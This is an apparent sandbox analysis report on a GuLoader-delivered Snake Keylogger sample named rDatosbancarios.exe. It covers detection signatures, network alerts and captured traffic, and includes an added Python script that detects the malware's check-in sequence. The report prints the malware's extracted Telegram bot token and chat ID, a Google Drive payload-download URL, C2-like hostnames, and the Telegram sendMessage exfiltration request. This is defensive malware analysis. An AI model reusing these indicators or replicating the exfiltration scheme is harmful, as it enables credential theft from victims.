Windows Analysis Report
rDatosbancarios.exe

Overview

General Information

Sample name: rDatosbancarios.exe
Analysis ID: 1634944
MD5: ad465ed89a2c85de228c1eca00ad3c21
SHA1: 693a1f701261b57a351587afaabcfd7e9e519db2
SHA256: 05e5731dc9129d9f1019a21fbbb672fa0a01a1bb8e89393e630b75ec38797928
Tags: exe, user-Porcupine

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • rDatosbancarios.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\rDatosbancarios.exe" MD5: AD465ED89A2C85DE228C1ECA00AD3C21)
    • rDatosbancarios.exe (PID: 664 cmdline: "C:\Users\user\Desktop\rDatosbancarios.exe" MD5: AD465ED89A2C85DE228C1ECA00AD3C21)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
Extracted Snake Keylogger configuration: {"Exfil Mode": "Telegram", "Token": "7869489618:AAHN5xZzcFLHOzYCX49Sa8fwJ0Zb2PusB48", "Chat_id": "7618581100", "Version": "4.4"}
Source | Rule | Description | Author
0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000A.00000002.3065111248.0000000033D59000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2064115944.0000000004506000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: rDatosbancarios.exe PID: 664 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: rDatosbancarios.exe PID: 664 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-11T08:09:33.607468+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:36.594270+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:39.240530+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:42.283716+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:44.577022+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:46.828365+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:49.028540+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:52.061609+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.16.1 | 443 | TCP
2025-03-11T08:09:28.502596+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:31.346349+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:33.752601+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:36.752651+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:39.424508+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:42.440235+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:44.752662+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:46.987000+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:49.190177+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49728 | 193.122.130.0 | 80 | TCP
2025-03-11T08:09:21.656836+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49726 | 142.250.185.142 | 443 | TCP
2025-03-11T08:09:55.021760+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 149.154.167.220 | 443 | TCP

            AV Detection

Source: rDatosbancarios.exe | Avira: detected
Source: 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7869489618:AAHN5xZzcFLHOzYCX49Sa8fwJ0Zb2PusB48", "Chat_id": "7618581100", "Version": "4.4"}
Source: rDatosbancarios.exe | Virustotal: Detection: 45%
Source: rDatosbancarios.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_36668790 CryptUnprotectData,10_2_36668790
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_36668EF1 CryptUnprotectData,10_2_36668EF1
Source: rDatosbancarios.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49729 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: rDatosbancarios.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_0040596F
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_004064C1 FindFirstFileW,FindClose,10_2_004064C1
Source: C:\Users\user\Desktop\rDatosbancarios.exe | Code function: 10_2_004027FB FindFirstFileW,10_2_004027FB
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\rDatosbancarios.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

            Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49738 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/03/2025%20/%2003:09:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49728 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.16.1:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49726 -> 142.250.185.142:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 104.21.16.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49729 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%2011/03/2025%20/%2003:09:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Tue, 11 Mar 2025 07:09:54 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
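The request sequence recorded above is the Snake Keylogger check-in: a public-IP lookup at checkip.dyndns.org, a GeoIP lookup of the returned address at reallyfreegeoip.org, then a Telegram Bot API sendMessage carrying the PC name, a timestamp and the country. Two details worth noting when reading the capture: the sendMessage URL has an empty bot token (nothing between /bot and /sendMessage) and an empty chat_id, and the only HTTP response listed in this section is a 404 with an application/json body, which is consistent with the Bot API rejecting a call with no token. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the malware. It parses request records in a constructed "|"-separated form built from the lines above, decodes the Telegram text into its fields, and flags the ordered lookup, lookup, exfil chain. The host-to-role table is the editor's own assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input (not a capture from the report's pcap): the request
# records listed in this section, with "|" separating the request line from
# each header so one record fits on one line.
SAMPLE_REQUESTS = [
    "GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1"
    "|User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
    "|Host: drive.google.com|Cache-Control: no-cache",
    "GET / HTTP/1.1"
    "|User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
    "|Host: checkip.dyndns.org|Connection: Keep-Alive",
    "GET /xml/8.46.123.189 HTTP/1.1|Host: reallyfreegeoip.org|Connection: Keep-Alive",
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:"
    "%2011/03/2025%20/%2003:09:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked"
    "%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D"
    " HTTP/1.1|Host: api.telegram.org|Connection: Keep-Alive",
]

# Assumed role table (editor's own, not from the report): the hosts that make up
# the Snake Keylogger check-in, in the order the sample contacts them.
HOST_ROLES = {
    "checkip.dyndns.org": "public-ip-lookup",
    "reallyfreegeoip.org": "geoip-lookup",
    "api.telegram.org": "telegram-bot-api",
}
CHECKIN_ORDER = ["public-ip-lookup", "geoip-lookup", "telegram-bot-api"]

# Telegram Bot API paths look like /bot<token>/<method>; an empty token is allowed
# by the regex on purpose so a broken config (as in this report) is still parsed.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(?P<token>[^/?]*)/(?P<method>[A-Za-z]+)")


def parse_request(record):
    """Split a "|"-separated request record into method, path, host and headers."""
    request_line, *header_lines = record.split("|")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "host": headers.get("host", "")}


def decode_telegram_sendmessage(path):
    """Recover token, chat_id and the decoded text of a /bot<token>/sendMessage call.

    Snake Keylogger sends the check-in as "Key: value" lines joined by CRLF, so the
    decoded text is also broken out into a field dict. Returns None for non-Bot-API paths.
    """
    match = TELEGRAM_BOT_PATH.match(path)
    if match is None:
        return None
    # parse_qs percent-decodes the values, so %0D%0A is already CRLF here.
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    text = params.get("text", [""])[0]
    fields = {}
    for line in text.split("\r\n"):
        key, sep, value = line.partition(":")
        if sep and not line.startswith("["):
            fields[key.strip()] = value.strip()
    return {
        "token": match.group("token"),
        "method": match.group("method"),
        "chat_id": params.get("chat_id", [""])[0],
        "text": text,
        "fields": fields,
    }


def classify(request):
    """Map a parsed request to its role in the infection chain."""
    host = request["host"]
    if host in HOST_ROLES:
        return HOST_ROLES[host]
    if host.endswith("google.com") and "download" in request["path"]:
        return "payload-download"
    return "other"


def triage(records):
    """Classify each record; decode the Telegram message where present."""
    findings = []
    for record in records:
        request = parse_request(record)
        finding = {"host": request["host"], "role": classify(request)}
        if finding["role"] == "telegram-bot-api":
            finding["message"] = decode_telegram_sendmessage(request["path"])
        findings.append(finding)
    return findings


def matches_checkin_chain(records):
    """True when the records contain, in order, IP lookup, GeoIP lookup, Telegram call."""
    roles = [f["role"] for f in triage(records)]
    position = 0
    for role in roles:
        if position < len(CHECKIN_ORDER) and role == CHECKIN_ORDER[position]:
            position += 1
    return position == len(CHECKIN_ORDER)


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding["role"], finding["host"])
        if "message" in finding:
            msg = finding["message"]
            print("  token=%r chat_id=%r fields=%s" % (msg["token"], msg["chat_id"], msg["fields"]))
    print("check-in chain present:", matches_checkin_chain(SAMPLE_REQUESTS))
```

The ordered-chain check is deliberately a subsequence match rather than an exact sequence: in the capture the checkip request is repeated many times and the Drive download sits in front, and a detection that required adjacency would miss it. In a proxy or Zeek log the same three-host sequence from one client in a short window is the signal to alert on; the decoded fields give the analyst the victim hostname and the time of first run straight from the URL.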
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033DF4000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: rDatosbancarios.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033D2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: rDatosbancarios.exe, 0000000A.00000002.3065111248.0000000033E0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20a
Source: rDatosbancarios.exe, 0000000A.00000003.2141319634.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 0000000A.00000003.2141274531.00000000037C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rDatosbancarios.exe, 0000000A.00000002.3066185499.0000000034F35000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
